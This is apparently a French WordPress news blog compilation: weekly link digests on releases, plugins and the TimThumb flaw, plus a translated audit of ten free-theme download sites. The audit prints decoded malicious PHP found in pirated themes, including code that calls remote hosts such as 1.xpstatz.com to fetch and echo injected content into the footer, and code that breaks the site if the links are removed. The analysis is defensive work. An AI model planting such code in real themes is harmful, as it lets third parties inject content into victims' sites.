Ce week end, la France a changé d’heure pour l’application de l’heure d’été. Si vous avez sélectionné le bon fuseau horaire (Paris) dans les réglages généraux, vous n’aurez rien à faire, le changement se fait automatiquement. Veillez donc a ce que le bon fuseau horaire soit sélectionné.

Twenty Twelve présent dans WordPress 3.5

Initialement prévu pour être livré avec WordPress 3.4, Twenty Twelve est finalement repoussé à WordPress 3.5. Il est malgré tout mis à disposition ici.

Qu’attendre de WordPress 3.4

La prochaine mouture de WordPress va apporter son lot de modifications. En voici un petit aperçu.

WP App Store

La petite polémique du moment porte sur le projet WP App Store qui propose une extension gratuite qui permet l’installation d’un accès vers des thèmes et extensions payantes dans le tableau de bord de WordPress. Une dizaine d’acteurs majeurs dans le contenus premium WordPress fait partie de l’aventure. Lancement prévu en avril 2012.

Une page d’archives pour les taxonomies personnalisées

Aurélien explique comment créer une page d’archives pour les taxonomies personnalisées de WordPress.

Activer le partage d’utilisateurs

Voici une astuce de Geekeries qui permet de partager des utilisateurs de WordPress au sein de différents services partageant la même base de données.

Créer une extension enfant

Julio nous explique comment réaliser une extension enfant. Suivez le guide.

Comment changer son identifiant

L’identifiant est fait pour ne pas être modifiable. Si vous souhaitez vraiment le modifier voici quand même une solution.

5 thèmes WordPress du mois de mars 2012

Une liste de 5 thèmes gratuits du mois de mars sélectionnés par ManageWP.

Rappel sur les mots de passe

Il est bon de rappeler l’utilité d’un bon mot de passe. WordPress est pris en exemple pour appuyer la démonstration.

Quelques astuces utiles

Quelques petites astuces qui peuvent être intéressantes à intégrer dans son site, selon ses besoins.

Des outils, des thèmes et des extensions

C’est ce que propose en un seul article Smashing Magazine. Ça vaut le coup d’œil.

18 erreurs à éviter lors du lancement d’un blog corporate

Une petite de 18 erreurs à éviter lorsque l’on veut lancer un blog corporate. Via @jflegat.

La version pour Android poursuit son évolution et passe en version 2.0.4. Mettez donc à jour.

Akismet 2.5.5

L’extension antispam la plus célèbre évolue beaucoup ces dernières semaines. 2 mises à jour en quelques jours la font arriver en version 2.5.5.

BuddyPress 1.5.3

Une mise à jour mineure de BuddyPress est sortie cette semaine : BuddyPress 1.5.3. Cette version a été aussitôt suivie par une autre mise à jour moindre puisqu’une version 1.5.3.1 est disponible.

Les résolutions de la nouvelle année de Lorelle

Lorelle présente une liste de résolutions pour 2012, ou plutôt quelles devraient être les bonnes résolutions des blogueurs…

Comment contribuer à WordPress quand on est pas développeur ?

Voici une question que beaucoup doivent se poser. WPMU.org propose une liste de suggestions pour celles et ceux qui ne sauraient pas comment participer à la communauté WordPress alors qu’ils ne sont pas développeurs. Je suis, je pense, un bon exemple de cette catégorie de personnes d’ailleurs Chacun peut faire selon ses connaissances et son envie.

Une extension pour remplacer functions.php

Aurélien explique comment conserver certaines fonctions ajoutées dans un thème lorsqu’on change justement ce dernier. L’idée est de les réunir au sein d’une extension.

Quand WordPress remplace PowerPoint

iMath vient de réussir un petit exploit, utiliser WordPress et son shortcode pour intégrer un diaporama PowerPoint trop lourd pour être uploadé. Le concept est original et la technique est très fine. Je décerne la palme de la semaine à cette astuce pour sa qualité.

Présentation de la nouvelle barre d’outils

Il y avait la barre d’admin, maintenant, il y a la barre d’outils. Une présentation s’impose.

Un tuto pour les débutants

Voici un tutoriel pour les débutants qui souhaitent mieux connaitre l’écran d’édition des articles et des pages.

7 conseils de sécurité

GeekPress revient sur la sécurité de votre site en donnant 7 conseils utiles pour se protéger.

Les types de contenus personnalisés abordables ?

C’est ce que propose cette interface d’administration afin de faciliter l’usage des CPT par tout un chacun. Intéressant !

20 thèmes gratuits

WP-Themes-pro propose une sélection de 20 thèmes récents et gratuits. La qualité est au rendez-vous et les thèmes pourvu de cryptage ont été nettoyés au préalable.

Après cet « article post hebdo », l’hebdo lui-même reprend ses droits avec des liens tirés de l’actualité WordPress de la semaine écoulée… car, oui, TimThumb n’aura pas porté toute l’attention vers lui.

La saga TimThumb

Je reprends volontairement le titre de l’article de Matt sur le sujet. Il résume bien la situation. Depuis une semaine environ, une faille de sécurité fait la une de l’actualité WordPress. Nos page Facebook et compte Twitter se sont fait les échos de cette affaire de sécurité et du correctif apporté dans les mêmes temps… Les réseaux sociaux sont très pratiques pour ce genre de communication de crise.

Mais il est bon de rappeler que cette faille de sécurité, si elle est bien réelle, n’est absolument pas une faille de WordPress. La nuance est importante.

En effet, WordPress n’est en aucun cas responsable de la faille et n’en est pas même affecté à proprement parlé. Cette faille a été découverte au sein d’un script qui se trouve être utilisé par de très nombreux thèmes WordPress et notamment des Premium : Timthumb, qui permet le redimensionnement des images. Là où le bât blesse, c’est que ce script largement utilisé donc, ne peux pas toujours être mis à jour facilement car il ne s’agit pas forcément d’une extension, mais il est souvent directement intégré dans le thème. Il est bien connu que même lorsqu’un éditeur de thème propose une mise à jour, l’utilisateur hésite à la mettre en place du fait des modifications apportées à sa propre installation. C’est ce que dit Matt :

Because the code is commonly embedded in themes it’s not easy to discretely update like it would be if the code were a plugin, and even when a theme is updated people are hesitant to update because they often customize theme code rather than making child themes, so if they were to overwrite their theme with a new version they’d lose their modifications. That, combined with the severity of the flaw, means that this is one of the more serious issues in the WordPress ecosystem in a while, even more than normal because it wasn’t in core.

Traduction :

Parce que le code est souvent intégré au thème, il n’est pas toujours facile de le mettre à jour comme on le ferait s’il s’agissait d’une extension, et même lorsque le thème serait mis à jour (ndlr : par son auteur), les utilisateurs seraient hésitant à mettre à jour parce qu’ils ont souvent personnalisé le code du thème directement plutôt que d’avoir créé un thème enfant, donc s’ils écrasent leur thème pour mettre à jour, ils écraseront leurs modifications. Ceci, combiné à la gravité de la faille, signifie que nous avons affaire à l’un des plus importants problèmes que l’écosystème de WordPress ait connu, même plus que d’ordinaire, puisque ce n’est pas le cœur de WordPress.

Notons que la solution existe !

Si vous avez ce script présent dans votre thème, vous devriez avoir un fichier nommé timthumb.php ou bien encore thumb.php. Il vous suffit alors de l’ouvrir dans votre éditeur de texte préféré et de remplacer le code par celui présent sur la page officiel du projet : http://timthumb.googlecode.com/svn/trunk/timthumb.php, puis vous enregistrez vos modifications et remettez le fichier à sa place dans votre thème.

La communauté a réagit tout de suite

D’une part, les thèmes du répertoire officiel sont analysés un à un pour être corrigé le cas échéant, les blogs des diverses communautés parlent du problème ouvertement.

D’autre part, Mark Maunder qui a découvert la faille a réalisé une mise à jour sous forme d’un fork qui est depuis, devenu la version 2.0 du script TimThumb suite à une collaboration avec l’auteur du script. Une prouesse de l’open source !

Avec WordPress, faites ce que vous voulez !

On ne le répétera jamais assez, WordPress n’est plus qu’un simple outil de blog, il est un vrai CMS, comme nous le (ré)explique Didier, notre cher Wolforg !

Un contenu personnalisé pour chaque visiteur

C’est ce que propose la nouvelle extension Personyze dont m’a fait part Danny Hen par e-mail cette semaine. Une extension qui permet d’enrichir l’expérience utilisateur très facilement et de manière puissante.

Comparer Joomla!, WordPress et Drupal selon les besoins

Voici un énième tableau comparant les 3 principaux CMS du moment, à savoir WordPress, Joomla! et Drupal. La comparaison se fait par besoin. Instructif.

Utiliser les Types de Contenu Personnalisés avec la Boucle

WPEngineer montre comment utiliser les fameux CPT avec la non moins fameuse Boucle de WordPress. Suivez le guide.

WordPress pour Windows Phone 7

Cela faisait quelques semaines que je ne vous avais pas parlé de version mobile de WordPress. Cette semaine, voici une nouvelle version de WordPress pour Windows Phone 7 qui voit le jour. Il s’agit de l’opus numéroté 1.2.

BuddyPress 1.5 Beta 2

Le développement de BuddyPress est reparti de plus belle avec une 2e beta en 2 semaines pour la future version 1.5.

Migrer un forum PHPbb vers bbPress

Vous disposez d’un forum PHPbb et vous souhaitez le migrer vers une installation de forum tournant sous la dernière version de bbPress, WPMU.org vous dit comment le faire.

Organiser les Types de contenus personnalisés

Si vous avez décidé d’utiliser les Custom Post Types de façon intensive, il vous faudra surement mettre de l’ordre dans votre installation. Voici comment classer votre CPT sous formes de dossiers. C’est Grégoire Noyelle qui en parle avec l’exemple de la mise en place d’une FAQ.

La gestion des miniatures en natif dans WordPress, comment ça marche ?

Aurélien Denis propose de récapituler comment gérer les miniatures dans WordPress… et sans TimThumb !

Générer une miniature d’un site

Vous voulez générer la miniature d’un site duquel vous indiquez une URL par exemple… voici comment faire ceci, expliqué par Valentin de Geekeries.

Les secrets de functions.php

Lumière de Lune nous délivre ici quelques secrets sur le célèbre fichier functions.php des thèmes WordPress. Cela devrait en intéresser plus d’un.

Nouveau groupe Facebook pour la communauté francophone de WordPress

Depuis quelques semaines, WordPress Francophone dispose d’une nouvelle page sur Facebook. Si vous ne nous avez pas encore rejoint, c’est simple, il suffit de cliquer sur le bouton « J’aime » présent sur la page. On vous attend.

WordPress 3.3

Le calendrier de développement de WordPress 3.3 a été dévoilé par Jane Wells le 20 juillet dernier. La sortie prévisionnelle est donc planifiée le 15 novembre. Le 27 juillet, elle proposait une liste de travail comprenant des nouvelles fonctionnalités potentielles à intégrer et des éléments à aborder dans ce nouveau « chantier ».

BuddyPress 1.5 Beta 1

Le développement de BuddyPress n’est pas aussi rapide et régulier que celui de WordPress mais il n’est pas à l’arrêt pour autant. La version 1.5 beta 1 vient d’être rendu disponible (Lien en français). Testeurs et développeurs, c’est à vous qu’elle s’adresse !

Diverses statistiques sur WordPress

Le site W3Techs publie quelques statistiques intéressantes sur WordPress. La consultation se passe par ici.

Découvrir les Shortcodes

Speckyboy donne un petit cours sur les shortcodes, ces petits codes que l’on peut créer pour ajouter facilement des contenus spécifiques dans ses articles et pages WordPress.

Créer une metabox

Lorsque l’on est développeur de thèmes et/ou d’extensions WordPress, il est bon de savoir ce qu’est une metabox et encore mieux de maitriser la manière d’en créer. C’est ce que wptuts+ s’emploie à faire… suivez le guide.

WPTouch touché par une faille critique

Si vous êtes un possesseur de l’extension WPTouch, mettez-la à jour si cela n’est pas encore fait. Boiteaweb signale une faille importante de sécurité touchant la version 1.9.31. Passez rapidement à la version 1.9.32.

Quel est votre CMS favori ? Votez !

Linux Journal propose un sondage afin de désigner le CMS favori des utilisateurs. Votez !

Un thèmes Google+

La Google+ mania n’en finie plus, un thème WordPress basé sur le design du nouveau réseau social vient de faire son apparition.

5 astuces pour sécuriser votre site WordPress

La sécurité est au cœur de toutes les préoccupations. Voici donc 5 points à connaitre pour la sécurité de votre site sous WordPress.

Ajouter un compte à rebours

Si vous avez besoin d’un compte à rebours sur votre site, voici une méthode utilisant jQuery via une extension.

Le mode « accessibilité » des Widgets

Il existe un mode « accessibilité » dans le tableau de gsetion des widgets. Effectivement, la page étant toute en javascript, il était nécessaire de la rendre accessible. Voici l’astuce à découvrir sur WPMU.org.

Vérification conditionnelle de Type de Contenu Personnalisé

Justin Tadlock donne un cours rapide sur la façon de gérer les Custom Post Type (Type de Contenu Personnalisé).

Supprimer la taxonomie de WordPress

Si vous avez besoin de supprimer définitivement les mots-clés et catégories de WordPress alors voici l’astuce qu’il vous faut.

Ajouter une fonction PDF dans Sharedaddy

Depuis l’arrivée de l’extension Jetpack, l’utilisation des liens disponibles dans Sharedaddy se démocratise. Il est même possible d’insérer ses propres services. Voici une astuce pour mettre un bouton permettant la transformation de la page en PDF.

55 astuces pour WordPress

Voici une liste de 55 astuces pour WordPress pour tout niveau, toute utilisation et tous utilisateurs…

L’équipe de développement a laissé entendre une sortie imminente de WordPress 3.1.1 sur le Twitter officiel de développement. Le trac en témoigne avec 100 % des tickets fermés. Et notons que le codex a été mis à jour et laisse apparaitre une page consacrée avec une sortie annoncée au 4 avril 2011. (NDR : Au moment où j’écris ces lignes, nous sommes lundi 4 avril 2011, il est 21 H 00 et cette version n’est pas encore sortie… mais le décalage horaire existe !).

Mise à jour du 5 avril : WordPress 3.1.1 est disponible en version originale depuis 17 H 10 environ… et en français dès maintenant.

Courir pour WordPress

Automattic lance le « Worlwide WP 5k ». Il s’agit de courir 5 km de la manière que l’on souhaite (en marchant, en courant, en vélo, en nageant…) et de se filmer/photographier… puis bien sur de la bloguer. Le but de l’opération est de rendre compte de la manière dont on l’a fait, où on l’a fait, etc. La date est fixée au 10 avril, mais il est possible de se lancer entre le 4 et le 10 avril. Pour vos publications qui suivront, utilisez le tag wwwp5k. Au départ, ce sont les « automatticiens » qui ont décidé cette initiative pour eux-mêmes et ils ont décidé d’ouvrir cette épreuve à tous les passionnés de WordPress.

Personnaliser et transformer un thème pour un site complexe

Lumière de Lune nous explique comment elle s’y est prise pour reprendre un thème entièrement de façon à l’adapter pour un site complexe. Intéressant de voir sa démarche.

14 astuces pour sécuriser un site WordPress

Aurélien liste 14 astuces permettant de sécuriser son site sous WordPress.

Améliorer l’administration sous Android

Logiclord n’est pas satisfait entièrement de l’application WordPress pour Android. Il la trouve trop limitée. Qu’à cela ne tienne, il rajoute ce qu’il attend.

Importation de Blogger vers WordPress

Vous avez commencer par bloguer sur la plateforme Blogger et aujourd’hui vous souhaiter migrer vers une installation WordPress. Comment faire la bascule sans dommage ? Il suffit de suivre ce lien.

Les 10 meilleurs hacks de tous les temps

C’est ce qu’annonce onextrapixel.com. Il donne son avis sur les hacks les plus connus et les détaille.

Désactiver le renouvellement du mot de passe

Daniel Roch nous propose de désactiver la fonction de renouvellement du mot de passe dans WordPress et ce, pour raison de sécurité notamment.

Rendre un thème plus attirant

WPMU.org donne 5 points qui permettent de rendre un site plus attractifs, notamment par l’utilisation des images et de la mise en page…

Comparaison des performances entre joomla!, WordPress et un site classique

Eticweb a comparé les performances de WordPress, de Joomla! et d’un site classique en HTML. Le résultat est intéressant…

Il y a quelques mois, j’avais écrit une liste de conseils pour sécuriser son installation WordPress  (« WordPress Security« ). Pour le présent article, je me suis armée des mots « free WordPress themes », et des extensions Theme Authenticity Checker (TAC) de builtBackwards et Exploit Scanner de Donncha O Caoimh, afin de me plonger dans la première page de résultats Google pour une recherche sur des thèmes WordPress gratuits, et voir à quel point ils peuvent être sécurisés — ou non.

A la recherche de thèmes !

Notez bien que je n’ai installé aucun des thèmes présentés ci-après sur mon serveur. Au lieu de cela, j’ai installé WordPress en local avec XAMPP. Je déconseille de mettre en ligne les thèmes provenant de sites inconnus : vous ne savez jamais le mal qu’ils pourraient faire !

1. WordPressThemesBase

WordPress Themes Base a la chance d’être en première position pour la recherche « Free WordPress Themes ». En voilà un qui a bien travaillé son optimisation pour les moteurs de recherche ! Le descriptif nous indique que le visiteurs n’y trouvera que des thèmes récents. Super ! J’adore les thèmes récents.

J’ai donc téléchargé le thème Prinz Brandford Magazine. Dès le départ, un problème se présente. Branford Magazine est un thème conçu par Der Prinz ; on en trouve une très vieille version qui n’est pas conçue pour WordPress 3.0 (autant que je puisse en juger), et une version Pro qui est sortie il y a peu. Cela signifie que vous avez le choix entre un thème qui ne marchera pas avec la dernière version de WP, ou un thème est soit-disant « professionnel ».

Installons le thème et testons-le avec l’extension TAC.

Du code chiffré ! On n’en est qu’au premier site sur Google, et déjà on essaye de nous avoir avec un chiffrement en Base64 ! Ca commence mal… Le codage base64 est souvent utilisé pour cacher du code malicieux. On peut voir que le code se trouve dans le pied de page, voyons voir ça de plus près :

Et ouais, mon copyright, comme il se doit ! Mais à quoi correspond ce codage base64 ? Voici le code lui-même :

Beaucoup de blabla.

Le codage base64 peut se décoder de deux manières :

• Utiliser le décodeur d’Otto, très pratique !
• Le décoder à la main, ou presque. Cela suppose de changer la fonctionn eval() pour un echo(), pour forcer l’affichage de ce qui est caché. Cet article en anglais vous explique la procédure.

J’ai choisir la seconde option. Le résultat de l’échange de fonctions :

Hein ?! Il y a une seconde c’était mon copyright !!! Mais ! Maintenant ça parle de télécharger un anti-virus. D’où cela vient-il ? Certainement de ce code en base64.

Le verdict

J’ai téléchargé deux autres thèmes de ce site, et ils contenaient également du code base64. Le base64 ne dissimule pas forcément que des liens. Il peut aussi cacher du code malicieux qui mettra la pagaille dans votre site. En plus de cela, ce site, qui promet des thèmes récents, propose en définitive des thèmes créés par d’autres personnes, auquel le propriétaire du site ajoute son code base64. J’ai contacté Michael Oeser de Der Prinz, et il m’a dit avoir tenté de contacter le webmaster afin d’enlever son thème, sans succès. Il a donc publié un avertissement sur site, sur le danger de télécharger des thèmes piratés. En tant que créateur du thème Branford Magazine, son conseil est d’éviter les sites comme celui-ci — assurément un bon conseil !

Ma suggestion

A éviter !

2. Free WordPress Themes

Un autre site avec des thèmes WordPress gratuits. Super ! Exactement ce que je cherche : j’adore tout ce qui est gratuit. Le premier thème de ce site se nomme BeautyStore. J’adore les boutiques de cosmétiques, donc je vais télécharger celui-ci, l’installer… et le tester avec TAC.

Du code crypté !

Le voici dans le pied de page :

Pour une magasin de cosmétiques, ce n’est pas très joli. On y trouve toutes sorties de fonctions chiffrées. J’ai transformé les eval() et echo(), sans succès. J’ai utilisé quelques décodeurs, mais cela reste illisible

Les testeurs de failles ne l’aiment pas plus que moi :

Toutes ces failles sont indiquées comme étant graves (« severe warning »)

Le verdict

On en est au deuxième site sur Google, et déjà on a du chiffrement en base64. J’ai téléchargé quelques autres thèmes qui contenaient des liens statiques et pas de base64. Je suppose que ce site est au petit bonheur la chance… Cependant, avec le site précédent j’avais pu déchiffrer le code, et là, non. Une recherche sur certains forums avec des extraits du code du pied de page indique que le code chiffré pourrait être du hacking Je ne suis pas assez technique pour le reconnaître, et je suppose que la plupart des utilisateurs de WordPress ne le sont pas plus. De fait…

Ma suggestion

A éviter !

3. Themes2WP

En survolant les thèmes de Themes2WP, on en trouve quelques-uns très tentants. Jetons un oeil à Gameliso, qui nous semble très joli.

TAC nous dit qu’il y trouve 5 liens statiques. En soit ce n’est pas grave : un développeur a le droit de faire un lien vers son site. Voici les liens en question :

Hmmmmm… Je ne sais pas pour vous, mais je ne vois pas trop ce que des sites pour célibataires ou pour des gardiens d’animaux ont à voir avec le développement de thèmes. Jetons un cil au code de footer.php :

Voici les liens, avec un message fort utile : « Ne modifiez pas le code suivant, sans quoi votre site ne marchera plus ! » C’est gentil de le dire ! J’ai failli enlever ces liens et casser mon site ! Ouf !

Sauf que… J’ai effectivement enlevé ces liens, et le site marche tout aussi bien.

Un autre lien se trouve dans sidebar.php :

Maintenant voyons les styles qui s’appliquent à la classe .ad_lnk :

Ouahou ! Voilà un lien qui sort de sentiers battus ! Il ne sert pas à grand-chose, hormis faire un lien caché.

Nous avons regardé les liens, voyons voir ce que donne le testeur de failles.

Le thème contient un eval() qui pourrait lancer du code malicieux. Ce n’est pas le genre de chose que l’on souhaite avoir dans son thème.

[NdT : il s'agit ici de la méthode globalEval() de jQuery(), qui est un eval() s'appliquant au contexte global. Le fonction en elle-même n'est pas forcément malicieuse, car des applications peuvent y faire appel de manière totalement inofensive]

Le verdict

De jolis thèmes, mais avec 5 liens vers des gens que vous ne souhaitez sans doute pas remercier.  Il va jusqu’à vous dire de ne retirer ces liens, ce que fera un débutant ne connaissant pas bien WordPress. Quant aux fonctions eval(), elles sont peut-être sans danger, mais je ne m’y connais pas assez en JavaScript pour vous dire si c’est le cas ou non.

Ma suggestion

A éviter !

4. FreeWPThemes

Maintenant que je suis convaincue que tous les sites en dehors de WordPress.org sont à éviter, j’ai été surprise de ne pas trouver de liens rajoutés dans aucun des thèmes que j’ai téléchargé sur FreeWPThemes. J’en ai téléchargé 5, ils avaient tous les mêmes liens :

Aucun de ces liens ne semble hors de propos. Je me suis donc sentie coupable de mes suppositions erronées.

Cependant, j’ai testé ces thèmes avec l’extension Theme Check. Celle-ci analyse votre thème pour s’assurer qu’il correspond aux bonnes pratiques. Voici son avis :

Plein d’erreurs ! Il y en a même plus que ça : je ne pouvais pas les mettre toutes dans une seule capture d’écran !

Le verdict

Bien que les thèmes de FreeWPThemes ne correspondent pas vraiment aux standards de qualité mis en place par le dépôt de thèmes de WordPress.org, il ne semble là rien y avoir de malicieux, même pas un lien caché. Il se peut que certains aspects d’un thème ne fonctionne pas comme attendu, mais rien de bien méchant !

Ma suggestion

Ca va, mais vérifiez bien que toutes les fonctionnalités qui vous sont nécessaire fonctionnent effectivement.

5. WordPress.org

Enfin ! WordPress.org ! Nous connaissons tous ce site. C’est le plus sûr pour trouver des thèmes. Je pense que le problème que l’on peut avoir le dépôt de thème est que nombre d’entre eux semble avoir été conçus au XVIIe sicèle (ou pas loin). Cela peut être frustrant, surtout parce que un grand ne fonctionne pas très bien avec WordPress 3.0. Au bas du présent article, je vous donnerai quelques liens vers d’autres bons sites où trouver de superbes thèmes.

Le verdict

Un site de confiance pour trouver des thèmes WordPress gratuits.

My suggestion

<3

6. Themes.Rock Kitty

Ce site présente une image d’un chat jouant une guitare. Tant qu’il y a un chat quelque part, je deviens très conciliante. Le premier thème que j’ai téléchargé n’a pas de liens publicitaire ou de code caché. Idem pour le deuxième. Mais le troisième m’a donné ceci :

Encore du base64 !

Cette fois-ci, changer les eval() pour un echo() m’a donné ceci :

Le lien du bas de page ressemblaient à ça :

Le scanner de failles m’a renvoyé 17 alertes graves pour ce thème. Etant donné que seuls 4 liens sont visibles en bas de page, je suppose que ce thème est rempli de liens cachés, ou qu’un truc pas clair se déroule dans son code.

Le verdict

A utiliser avec précaution. Si vous comptez leur télécharger des thèmes, installez-le d’abord en local, et vérifiez-les. Voici un n-ième site où vous pourriez vous retrouver à télécharger un thème qui vous détournera votre site. Soyez prudents !

Ma suggestion

A éviter !

7. WP Themes Depot

Un autre site qui nous propose les thèmes WordPress les plus récents, les plus à jour, les plus beaux, les plus gratuits. Cette fois, j’ai téléchargé le thème le plus populaire du site, Nifertiti, téléchargé 980 fois. Comme d’habitude, je l’ai donné en pâture à TAC, qui m’a indiqué le code chiffré suivant :

En changeant les eval() en echo(), on obtient :

Ils ne veulent pas apparemment pas que je me débarrasse de leur code. Ces liens apparaissent dans le pied de page :

Le verdict

Encore un site avec du base64 dans son code. Je pense qu’il n’est pas nécessaire de répéter qu’on ne peut pas avoir confiance en ce type de code. Un développeur peut très bien ajouter des liens à son thème, mais les dissimuler avec du base64, c’est tout autre chose. Surtout quand on sait qu’un tel chiffrement peut cacher du code malicieux.

Ma suggestion

A éviter !

8. WPRex

Je téléchargé 5 thèmes chez WPRex, les deux premiers contenaient des liens vers du spam, et les trois autres contenaient (surprise surprise) du base64.

Il s’agit de Pink Desire. Déchiffrons-le avec le décodeur :

Des liens cachés.

Le verdict

Encore un site moyen. Si vous devez télécharger un de leurs thèmes, vérifiez bien ce qu’il affiche avec le TAC, et le décodeur pour tout ce qui est caché en base64.

Ma suggestion

A éviter !

9. No Limits Web Design

J’avais de bons espoirs pour ce site, à cause de son nom différent des autres, mais non, même annonce : de super thèmes WordPress gratuits. J’ai téléchargé l’un des thèmes mis en avant, Dark Night, et une fois de plus, du code base64.

En plus du base64, j’ai trouvé un eval(str_rot13()). Vous pouvez le décoder avec cet outil. J’ai obtenu ce résultat :

C’est en gros la licence. Cependant, en transformant le eval() du haut de la page en echo(), on obtient ceci :

function wp_code() {
		$default_link_text = "Default";
		$link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
		$link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
		$l = "";
		foreach($link_host as $value) {
			if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
				while (!feof ($file)) {
					$line = fgets ($file);
					$l .= $line;
				}
				fclose($file);
				break;
			} else {
				if ($value == end($link_host)) {
					$l=$default_link_text;
				}
			}
		}
		return $l;
	}
	function check_wp_code_sidebar() {
		$uri = strtolower($_SERVER["REQUEST_URI"]);
		if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {
		} else {
			$l="";
			$f = dirname(__file__) . "/sidebar.php";
			$fd = fopen($f, "r");
			$c = fread($fd, filesize($f));
			fclose($fd);
			if (strpos($c, $l) == 0) { die; }
		}
	}
	check_wp_code_sidebar();

Ce thème rajoute des links dans la barre latérale. Pauvre site !

Voici ce qu’indique le testeur de failles :

Le verdict

Encore un site avec du base64, donc a éviter. Celui-ci a des liens encore plus cachés que les autres.

Ma suggestion

A éviter !

10. Templates Browser

On en a presque terminé ! En fait, j’ai fait une petite recherche sur Templates Browser, et trouvé cet article. Vous pouvez donc vous douter de ce qu’il va arriver. J’ai téléchargé le thème Dropshadow, qui en réalité a été créé par Brian Gardner, mais que vous ne pouvez plus obtenir depuis son site (sans doute parce qu’il est assez vieux, et pas compatible avec WP 3.0).

TAC a trouvé ces liens :

Voilà un bien gros morceau de PHP. Celui-ci se rapporte à un site de casino en ligne. Cependant, on y trouve du code encore plus suspicieux. Le voici au propre :

get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
$l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");

if (empty($l_time_code)) {
 $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
 $new_time_code = 0;
} else
 $new_time_code = intval($l_time_code[0]);

if (empty($l_code)) {
 $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '', 'no')");
 $new_l_code = '';
} else $new_l_code = $l_code[0];

if ( ( time() - $new_time_code ) >= 60 ) {
 $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
 $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
 $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
 $xps = "xps.";
 $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
 $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);

 //1.xpstatz.com/xps.php?h=host&u=uri
 if (ini_get('allow_url_fopen')) {
 $new_l_code = @file_get_contents("http://" . $url . $page);
 } else {
 $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
 if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
 @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
 $new_l_code = "";
 while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
 $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
 }
 $new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
 }
 @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
 }
 if ( strpos($new_l_code, '[/]') ) {
 $new_time_code = time();
 $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
 $wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'");     $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
 }
}

if ( strpos($new_l_code, '[/]') ) {
 $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
 $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
 echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
 $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
}
?>

Il stocke des liens dans la base de données, et toutes les 60 secondes va récupérer un code provenant d’un site tiers. Il met ensuite à jour l’horodatage de ces liens, et les affiche dans le pied de page.

En bref, une manière bien complexe de faire ce qui a déjà été décrit pour les autres thèmes frauduleux.

Le verdict

C’était déjà mal partis quand un autre site nous indique que Templates Browser contient du malware. Ca s’est aggravé quand on a constaté qu’ils ont piqué le thème d’un designer respecté. Le gros morceau de code n’est que la goutte qui fait déborder le vase.

Ma suggestion

A éviter !

Conclusion

Voici les stats pour les 10 premiers sites de la première page Google :

• Sûr : 1
• Mouais : 1
• A éviter : 8

8 des 10 sites utilisent du base64 dans leur thème. L’utilisateur WordPress moyen sait peut-être qu’il ne faut pas télécharger n’importe quel thème, mais le stats de ces sites indiquent des milliers de téléchargements. Un nouveau venu aura de grande chance de taper « free WordPress themes » dans Google et tomber sur un site qui leur donne ce qu’il cherche, mais avec des liens en trop et du code malicieux.

Bien entendu, le dépôt de thèmes officiels de WordPress.org peut être frustrant, car tous ses thèmes ne sont pas forcément compatibles avec WP 3.0, et beaucoup sont un peu datés/dépassés, voire présentent des bugs avec les dernières versions de WP. Voic donc quelques sites sûr où trouver des thèmes WordPress gratuits…

Bons sites de thèmes WordPress gratuits

• Theme Shaper
• ThemeLab
• Theme Hybrid
• Arras Theme
• Smashing Magazine

Bons sites avec des thèmes WordPress payants, et quelques-uns gratuits

• Graph Paper Press
• Woo Themes

Decodeurs

Si vous voulez inspecter un thème qui vous semble suspect, voici quelques ressources utiles (source):

• $o= Le décocdeur d’Otto
• $_F=__FILE__:
• eval(gzinflate(base64_decode('...')));:
• eval(str_rot13(' ... '));
• Other codes
• Manual base64 decode

Extensions utiles

• Theme Authenticity Checker
• Exploit Scanner
• Theme Check

A lire (en anglais)

• Chip Bennett analyse les 30 premiers sites de thèmes sur Google
• Otto dissecte les codes malicieux dans les thèmes
• ThemeLab explique pourquoi il ne faut pas télécharger de thèmes en provenance de sites inconnus

Transfert de la marque WordPress

Matt l’a annoncé cette semaine, cette fois c’est officiel : la propriété de la marque WordPress a été transférée vers la Fondation WordPress via un don d’Automattic. Ainsi, elle n’est plus la propriété de cette dernière mais de la fondation à but non lucratif. Ce changement entraine quelques modifications dans les conditions d’utilisation de la dite marque.

